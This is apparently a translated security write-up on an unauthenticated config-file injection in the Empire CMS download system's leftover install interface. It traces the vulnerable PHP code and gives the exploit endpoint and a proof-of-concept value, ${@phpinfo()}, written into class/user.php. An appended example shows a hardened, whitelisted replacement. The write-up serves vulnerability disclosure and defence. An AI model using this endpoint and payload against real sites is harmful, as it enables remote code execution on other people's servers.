This concerns the Empire CMS download system.
PS: a shell can be written directly, with no account or password required.
By: Xidu
Because many websites need to integrate Discuz and other forums for downloads, Empire ships an interface for this.
Many sites never delete this interface, which leaves a serious security hole: a direct getshell. The code is analyzed below.
When we submit, the request goes to index.php?install=1&setup=SetConfig
    if ($_GET['install'] == 1) {
        @include("../class/connect.php");
        @include("../class/db_sql.php");
        @include("../class/functions.php");
        $link = db_connect();
        $empire = new mysqlquery();
        // $setup comes straight from the setup= query parameter; nothing checks
        // whether the caller is logged in or whether installation already finished
        if ($setup == "SetConfig") {
            SetUserCOMConfig($_POST);
        } elseif ($setup == "alter") {
            InstallUserCOM();
        } elseif ($setup == "update") {
            UpdateUserCOM();
        } else {
        }
    }
Here it calls the SetUserCOMConfig function, so we keep tracing.
At line 15 of data/fun.php we find this function:
    function SetUserCOMConfig($add) {
        $filetext = ReadFiletext('data/user.php');
        if (empty($filetext)) {
            InstallShowMsg('file/update/data/user.php is lost and installation fails.');
        }
        $vr = explode(",", ReturnRepUserVar());
        $count = count($vr);
        for ($i = 0; $i < $count; $i++) {
            // every [!@--name--@!] placeholder is replaced with the raw POST value $add[name]
            $filetext = str_replace("[!@--" . $vr[$i] . "--@!]", $add[$vr[$i]], $filetext);
        }
        // Write the configuration file
        $fp = @fopen("../class/user.php", "w");
        if (!$fp) {
            InstallShowMsg('/class/user.php file permission is not set to 0777, the installation is not successful.');
        }
        @fputs($fp, $filetext);
        @fclose($fp);
        ... // omitted
    }
Here it runs $filetext = str_replace("[!@--" . $vr[$i] . "--@!]", $add[$vr[$i]], $filetext);
That is, the submitted values are substituted into the placeholders, unfiltered, and the result is assigned back to $filetext.
See the following:
    // Write the configuration file
    $fp = @fopen("../class/user.php", "w");
    if (!$fp) {
        InstallShowMsg('/class/user.php file permission is not set to 0777, the installation is not successful.');
    }
    @fputs($fp, $filetext);
It opens class/user.php and writes $filetext into it.
Let's look at what gets written: submit an arbitrary value.
It is then written into class/user.php, and that is how the 0-day arises.
So let's write ${@phpinfo()} and try it out.
Then access the class/user.php file.
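As an added example (this is not code from the write-up or from Empire CMS), here is what a hardened version of SetUserCOMConfig would look like: it refuses to run once an install lock exists, and it validates every posted value against a whitelist before substituting it into the template, so a value containing ${...} can never reach class/user.php, where PHP would interpolate it inside a double-quoted string. The lock-file path, the template contents and the helper names are assumptions.

```php
<?php
// Added example, not Empire CMS code: a hardened replacement for
// SetUserCOMConfig(). Assumed: the template keeps [!@--name--@!]
// placeholders, and the installer drops a lock file once setup is done.
// All file paths here are hypothetical.

// Only values matching this pattern are accepted. It excludes '$', '{', '}',
// quotes, backslashes and newlines, so a value can neither close the string
// literal it lands in nor trigger "${...}" interpolation in user.php.
const SAFE_VALUE = '/^[A-Za-z0-9_.@:\/\-]{0,128}\z/';

/**
 * Returns the rendered config text, or null when installation is already
 * locked. Throws on a value that fails validation.
 */
function SetUserCOMConfigHardened(array $add, array $names, string $template, string $lockFile): ?string
{
    // 1. The installer must be dead after setup: refuse to run once locked.
    if (file_exists($lockFile)) {
        return null;                 // caller answers 403 and logs the attempt
    }
    // 2. Validate every value before touching the file.
    foreach ($names as $name) {
        $value = $add[$name] ?? '';
        if (!is_string($value) || !preg_match(SAFE_VALUE, $value)) {
            throw new InvalidArgumentException("rejected value for '$name'");
        }
        $template = str_replace('[!@--' . $name . '--@!]', $value, $template);
    }
    return $template;
}

/**
 * Writes the config atomically (temp file + rename) and creates the lock
 * so the installer cannot be re-run. Returns true on success.
 */
function writeConfigAndLock(string $text, string $configPath, string $lockFile): bool
{
    $tmp = $configPath . '.tmp';
    if (file_put_contents($tmp, $text, LOCK_EX) === false || !rename($tmp, $configPath)) {
        return false;
    }
    return file_put_contents($lockFile, date('c') . "\n", LOCK_EX) !== false;
}

// --- Demonstration with a constructed template (not the real user.php) ---
$names    = ['dbname', 'dbuser'];
$template = "<?php\n\$dbname = \"[!@--dbname--@!]\";\n\$dbuser = \"[!@--dbuser--@!]\";\n";
$lockFile = sys_get_temp_dir() . '/empire-install.lock';   // hypothetical path
@unlink($lockFile);

// Ordinary values pass.
$ok = SetUserCOMConfigHardened(['dbname' => 'empire', 'dbuser' => 'web_ro'], $names, $template, $lockFile);
assert(strpos($ok, '"empire"') !== false);

// The value from the write-up is rejected instead of being written to disk.
try {
    SetUserCOMConfigHardened(['dbname' => '${@phpinfo()}', 'dbuser' => 'x'], $names, $template, $lockFile);
    echo "BUG: value accepted\n";
} catch (InvalidArgumentException $e) {
    echo "rejected as expected: ", $e->getMessage(), "\n";
}

// After the lock exists the function does nothing, whatever is posted.
writeConfigAndLock($ok, sys_get_temp_dir() . '/user.php', $lockFile);
echo SetUserCOMConfigHardened(['dbname' => 'empire'], $names, $template, $lockFile) === null
    ? "installer locked\n"
    : "BUG: ran after lock\n";
```

The real fix for a deployed site is still the one the write-up points at: delete the install interface after setup. The lock file only backstops the case where it was left behind, and the whitelist closes the write primitive if it is ever reached anyway.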